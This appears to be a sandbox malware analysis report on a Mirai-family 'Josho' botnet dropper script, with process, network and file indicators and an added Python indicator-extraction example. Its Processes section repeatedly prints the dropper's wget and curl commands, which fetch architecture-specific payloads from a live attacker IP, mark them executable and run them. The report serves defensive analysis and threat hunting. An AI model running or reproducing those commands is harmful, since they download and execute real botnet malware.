Malware Analysis Report

2024-11-15 05:43

Sample ID 240427-wkt84aeb7v
Target 8UsA.sh
SHA256 09ae6fb139fb48daf4a6fb4c6754a040367836054ed902f19211806696470cc9
Tags
mirai josho botnet
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

09ae6fb139fb48daf4a6fb4c6754a040367836054ed902f19211806696470cc9

Threat Level: Known bad

The file 8UsA.sh was found to be: Known bad.

Malicious Activity Summary

mirai josho botnet

Mirai

Executes dropped EXE

Modifies Watchdog functionality

Changes its process name

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-27 17:59

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-27 17:59

Reported

2024-04-27 18:02

Platform

ubuntu1804-amd64-20240226-en

Max time kernel

148s

Max time network

149s

Command Line

[/tmp/8UsA.sh]

Signatures

Mirai

botnet mirai

Executes dropped EXE

Description   Indicator   Process     Target   Count
N/A           /tmp/3AvA   /tmp/3AvA   N/A      10 (one per [./3AvA ssh] launch listed under Processes)

Modifies Watchdog functionality

Description                    Indicator            Process     Target   Count
File opened for modification   /dev/watchdog        /tmp/3AvA   N/A      10
File opened for modification   /dev/misc/watchdog   /tmp/3AvA   N/A      10

Each /tmp/3AvA instance opens both watchdog device paths for writing. Mirai-family bots do this to disable the hardware watchdog (WDIOC_SETOPTIONS with WDIOS_DISABLECARD) so the device is not rebooted when the bot hangs or saturates it. The sandbox records the open, not the ioctl, so the disable itself is inferred from the family, not observed in this report.

Changes its process name

Description                                                       Indicator   Process     Target   Count
Changes the process name, possibly in an attempt to hide itself   N/A         /tmp/3AvA   N/A      10

Fired once per /tmp/3AvA launch. In the public Mirai source the bot overwrites argv[0] with a random string and sets the same name with prctl(PR_SET_NAME), so the name shown by ps will not match the on-disk path. When hunting, correlate on the executable path (/proc/<pid>/exe) rather than the command name.

Writes file to tmp directory

Description                    Indicator          Process         Target
File opened for modification   /tmp/Josho.x86     /usr/bin/wget   N/A
File opened for modification   /tmp/Josho.x86     /usr/bin/curl   N/A
File opened for modification   /tmp/Josho.mips    /usr/bin/wget   N/A
File opened for modification   /tmp/Josho.mips    /usr/bin/curl   N/A
File opened for modification   /tmp/Josho.mpsl    /usr/bin/wget   N/A
File opened for modification   /tmp/Josho.mpsl    /usr/bin/curl   N/A
File opened for modification   /tmp/Josho.arm4    /usr/bin/curl   N/A
File opened for modification   /tmp/Josho.arm5    /usr/bin/wget   N/A
File opened for modification   /tmp/Josho.arm5    /usr/bin/curl   N/A
File opened for modification   /tmp/Josho.arm6    /usr/bin/wget   N/A
File opened for modification   /tmp/Josho.arm6    /usr/bin/curl   N/A
File opened for modification   /tmp/Josho.arm7    /usr/bin/wget   N/A
File opened for modification   /tmp/Josho.arm7    /usr/bin/curl   N/A
File opened for modification   /tmp/Josho.ppc     /usr/bin/wget   N/A
File opened for modification   /tmp/Josho.ppc     /usr/bin/curl   N/A
File opened for modification   /tmp/Josho.m68k    /usr/bin/wget   N/A
File opened for modification   /tmp/Josho.m68k    /usr/bin/curl   N/A
File opened for modification   /tmp/Josho.sh4     /usr/bin/wget   N/A
File opened for modification   /tmp/Josho.sh4     /usr/bin/curl   N/A
File opened for modification   /tmp/3AvA          /tmp/8UsA.sh    N/A

Ten payload builds are written (x86, mips, mpsl, arm4, arm5, arm6, arm7, ppc, m68k, sh4), each fetched with both wget and curl; the script does not check the host CPU first. The report's table carries no wget write for Josho.arm4 even though the [wget ... Josho.arm4] command line appears under Processes. /tmp/3AvA is written by the script process itself rather than by wget or curl, which together with the [cat Josho.x86] step under Processes is consistent with the payload being copied to a fixed name before execution (inferred; the sandbox does not show the shell redirection).

Processes

The list below is the sandbox process tree flattened in launch order. The script repeats one block per architecture: fetch Josho.<arch> with wget and again with curl, chmod +x every name in /tmp, then run ./3AvA with the single argument ssh. The chmod argument list grows by one Josho.* file per round and also contains unrelated sandbox directories (config-err-*, netplan_*, snap-private-tmp, systemd-private-*), which is what a shell-expanded chmod +x * run from /tmp looks like (inferred from the argument lists; the script body is not shown). In the public Mirai source argv[1] is copied into an identifier string that the bot sends to its C2 on check-in, so the ssh argument most likely tags the infection vector.

/tmp/8UsA.sh

[/tmp/8UsA.sh]

/usr/bin/wget

[wget http://209.14.69.249/AB4g5/Josho.x86]

/usr/bin/curl

[curl -O http://209.14.69.249/AB4g5/Josho.x86]

/bin/cat

[cat Josho.x86]

/bin/chmod

[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]

/tmp/3AvA

[./3AvA ssh]

/usr/bin/wget

[wget http://209.14.69.249/AB4g5/Josho.mips]

/usr/bin/curl

[curl -O http://209.14.69.249/AB4g5/Josho.mips]

/bin/chmod

[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.mips Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]

/tmp/3AvA

[./3AvA ssh]

/usr/bin/wget

[wget http://209.14.69.249/AB4g5/Josho.mpsl]

/usr/bin/curl

[curl -O http://209.14.69.249/AB4g5/Josho.mpsl]

/bin/chmod

[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]

/tmp/3AvA

[./3AvA ssh]

/usr/bin/wget

[wget http://209.14.69.249/AB4g5/Josho.arm4]

/usr/bin/curl

[curl -O http://209.14.69.249/AB4g5/Josho.arm4]

/bin/chmod

[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]

/tmp/3AvA

[./3AvA ssh]

/usr/bin/wget

[wget http://209.14.69.249/AB4g5/Josho.arm5]

/usr/bin/curl

[curl -O http://209.14.69.249/AB4g5/Josho.arm5]

/bin/chmod

[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]

/tmp/3AvA

[./3AvA ssh]

/usr/bin/wget

[wget http://209.14.69.249/AB4g5/Josho.arm6]

/usr/bin/curl

[curl -O http://209.14.69.249/AB4g5/Josho.arm6]

/bin/chmod

[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]

/tmp/3AvA

[./3AvA ssh]

/usr/bin/wget

[wget http://209.14.69.249/AB4g5/Josho.arm7]

/usr/bin/curl

[curl -O http://209.14.69.249/AB4g5/Josho.arm7]

/bin/chmod

[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.mips Josho.mpsl Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]

/tmp/3AvA

[./3AvA ssh]

/usr/bin/wget

[wget http://209.14.69.249/AB4g5/Josho.ppc]

/usr/bin/curl

[curl -O http://209.14.69.249/AB4g5/Josho.ppc]

/bin/chmod

[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.mips Josho.mpsl Josho.ppc Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]

/tmp/3AvA

[./3AvA ssh]

/usr/bin/wget

[wget http://209.14.69.249/AB4g5/Josho.m68k]

/usr/bin/curl

[curl -O http://209.14.69.249/AB4g5/Josho.m68k]

/bin/chmod

[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.m68k Josho.mips Josho.mpsl Josho.ppc Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]

/tmp/3AvA

[./3AvA ssh]

/usr/bin/wget

[wget http://209.14.69.249/AB4g5/Josho.sh4]

/usr/bin/curl

[curl -O http://209.14.69.249/AB4g5/Josho.sh4]

/bin/chmod

[chmod +x 3AvA 8UsA.sh config-err-D3a0uv Josho.arm4 Josho.arm5 Josho.arm6 Josho.arm7 Josho.m68k Josho.mips Josho.mpsl Josho.ppc Josho.sh4 Josho.x86 netplan_xrvzy18l snap-private-tmp ssh-F7vsPmKVSALQ systemd-private-b6a321e942804f008c17c0a29c564fce-bolt.service-Z8cgSC systemd-private-b6a321e942804f008c17c0a29c564fce-colord.service-lNF0eJ systemd-private-b6a321e942804f008c17c0a29c564fce-fwupd.service-pfKTCK systemd-private-b6a321e942804f008c17c0a29c564fce-ModemManager.service-dvSeZ0 systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-resolved.service-NMRFke systemd-private-b6a321e942804f008c17c0a29c564fce-systemd-timedated.service-3TZQ7o]

/tmp/3AvA

[./3AvA ssh]

Network

Country   Destination          Domain          Proto   Count
BR        209.14.69.249:80     209.14.69.249   tcp     20
BR        209.14.69.249:666    -               tcp     11
N/A       224.0.0.251:5353     -               udp     1
US        151.101.130.49:443   -               tcp     1
US        1.1.1.1:53           cdn.fwupd.org   udp     2
US        151.101.194.49:443   cdn.fwupd.org   tcp     1
GB        185.125.188.61:443   -               tcp     2
US        151.101.1.91:443     -               tcp     2
GB        89.187.167.5:443     -               tcp     1

The 20 connections to 209.14.69.249:80 match the 20 wget/curl fetches in the process list (10 architectures, two fetches each). The 11 connections to 209.14.69.249:666 have no download counterpart and arrive roughly once per [./3AvA ssh] launch, so 209.14.69.249:666/tcp is the check-in endpoint to block and hunt for; the sandbox does not attribute network rows to processes, so this is an inference from ordering and counts. The remaining destinations (mDNS to 224.0.0.251, DNS and HTTPS for cdn.fwupd.org, and the HTTPS endpoints with no resolved domain) are not referenced by any command line in the report and are consistent with background services on the Ubuntu 18.04 detonation VM; treat them as noise unless a detonation on a quiet image reproduces them.
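To turn the process list and network table above into indicators without hand-copying, here is an added Python example (not part of the sandbox report and not the vendor's tooling). It parses command lines in the report's [argv ...] form and network rows in its "Country Destination Domain Proto" form, extracts the payload URLs and architectures, follows the fetch -> chmod +x -> ./name chain, and flags connections to a payload host on a port other than the one that served the payload. The sample data is constructed from this report: the chmod argument lists are abbreviated and the network rows are collapsed to (row, occurrences). The function names and the "other port on the same host" heuristic are my own choices.

```python
"""Indicator extraction from a flattened sandbox process list and network table.

Added example; sample data is constructed from the report above.
"""
from collections import Counter
from urllib.parse import urlparse

# Architectures in the order the dropper fetched them (Processes section).
ARCHES = ["x86", "mips", "mpsl", "arm4", "arm5", "arm6", "arm7", "ppc", "m68k", "sh4"]
BASE_URL = "http://209.14.69.249/AB4g5/Josho."


def build_process_lines():
    """Reconstruct the Processes section as '[argv ...]' lines (constructed)."""
    lines = ["[/tmp/8UsA.sh]"]
    fetched = []
    for arch in ARCHES:
        fetched.append(f"Josho.{arch}")
        lines.append(f"[wget {BASE_URL}{arch}]")
        lines.append(f"[curl -O {BASE_URL}{arch}]")
        if arch == "x86":
            lines.append("[cat Josho.x86]")  # payload copied to 3AvA (inferred)
        # the real line lists every name in /tmp; abbreviated here
        lines.append("[chmod +x 3AvA 8UsA.sh " + " ".join(sorted(fetched)) + "]")
        lines.append("[./3AvA ssh]")
    return lines


# Rows as printed in the report (Domain column may be empty), with occurrence counts.
NETWORK_ROWS = [
    ("BR 209.14.69.249:80 209.14.69.249 tcp", 20),
    ("BR 209.14.69.249:666 tcp", 11),
    ("N/A 224.0.0.251:5353 udp", 1),
    ("US 1.1.1.1:53 cdn.fwupd.org udp", 2),
    ("US 151.101.194.49:443 cdn.fwupd.org tcp", 1),
    ("US 151.101.130.49:443 tcp", 1),
    ("US 151.101.1.91:443 tcp", 2),
    ("GB 185.125.188.61:443 tcp", 2),
    ("GB 89.187.167.5:443 tcp", 1),
]


def parse_argv(line):
    """'[wget http://h/x]' -> ['wget', 'http://h/x']."""
    return line.strip()[1:-1].split()


def download_urls(lines):
    """Unique URLs handed to wget/curl (each file is fetched twice in this sample)."""
    urls = set()
    for line in lines:
        argv = parse_argv(line)
        if argv and argv[0] in ("wget", "curl"):
            urls.update(a for a in argv[1:] if a.startswith(("http://", "https://")))
    return sorted(urls)


def payload_architectures(urls):
    """Suffix after the last '.' of the URL path: Josho.mpsl -> mpsl."""
    return sorted(urlparse(u).path.rsplit(".", 1)[-1] for u in urls)


def drop_and_execute_chain(lines):
    """Follow fetch -> chmod +x -> ./name in launch order.

    Returns (fetched basenames, names made executable, executions of a
    chmod'ed binary from the working directory as (name, args) tuples).
    A name that is executed but never fetched was renamed or copied first.
    """
    fetched, executable, execs = set(), set(), []
    for line in lines:
        argv = parse_argv(line)
        if not argv:
            continue
        if argv[0] in ("wget", "curl"):
            for url in (a for a in argv[1:] if a.startswith("http")):
                fetched.add(urlparse(url).path.rsplit("/", 1)[-1])
        elif argv[0] == "chmod" and any(a.startswith("+") and "x" in a for a in argv[1:]):
            executable.update(a for a in argv[1:] if not a.startswith("+"))
        elif argv[0].startswith("./") and argv[0][2:] in executable:
            execs.append((argv[0][2:], tuple(argv[1:])))
    return fetched, executable, execs


def parse_network_row(row):
    """'BR 209.14.69.249:666 tcp' -> dict; Domain is None when the column is empty."""
    tok = row.split()
    ip, port = tok[1].rsplit(":", 1)
    return {"country": tok[0], "ip": ip, "port": int(port),
            "domain": tok[2] if len(tok) == 4 else None, "proto": tok[-1]}


def c2_candidates(rows, urls):
    """Connections to a payload-hosting IP on a port that did not serve a payload."""
    served = {}
    for u in urls:
        p = urlparse(u)
        served.setdefault(p.hostname, set()).add(p.port or (443 if p.scheme == "https" else 80))
    hits = Counter()
    for row, n in rows:
        r = parse_network_row(row)
        if r["ip"] in served and r["port"] not in served[r["ip"]]:
            hits[(r["ip"], r["port"], r["proto"])] += n
    return hits


if __name__ == "__main__":
    lines = build_process_lines()
    urls = download_urls(lines)
    fetched, executable, execs = drop_and_execute_chain(lines)
    print("payload URLs:", len(urls), "architectures:", payload_architectures(urls))
    print("executions from cwd:", dict(Counter(execs)))
    print("executed but never fetched (renamed payload):", {n for n, _ in execs} - fetched)
    print("C2 candidates:", dict(c2_candidates(NETWORK_ROWS, urls)))
```

Running it reports 10 payload URLs across the 10 architectures, 10 executions of 3AvA with the argument ssh, 3AvA as a name that was executed but never fetched (the copied payload), and 209.14.69.249:666/tcp as the only candidate check-in channel. The heuristic is deliberately narrow: it only flags ports on hosts that also served a payload, so it will not pick up a C2 on a second host, and it needs the process list to decide which ports were legitimate downloads.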

Files

/tmp/Josho.x86

MD5 a648e3916f191a59f47d07a49702d0eb
SHA1 1d9280fd392858f5dbe61aea4cfa2453ade97442
SHA256 0a82c84b8564ae5a178e3e8f6fc4550885055043928ee667e59efb035f9ccfc3
SHA512 73ef7ce042d0d165c327acd50e984a08b3d8450fb8821c8ef390a8dc02044128836ba7590bd035a072a9b7a4c94defed1256e85b03887788fa998e5648b5e587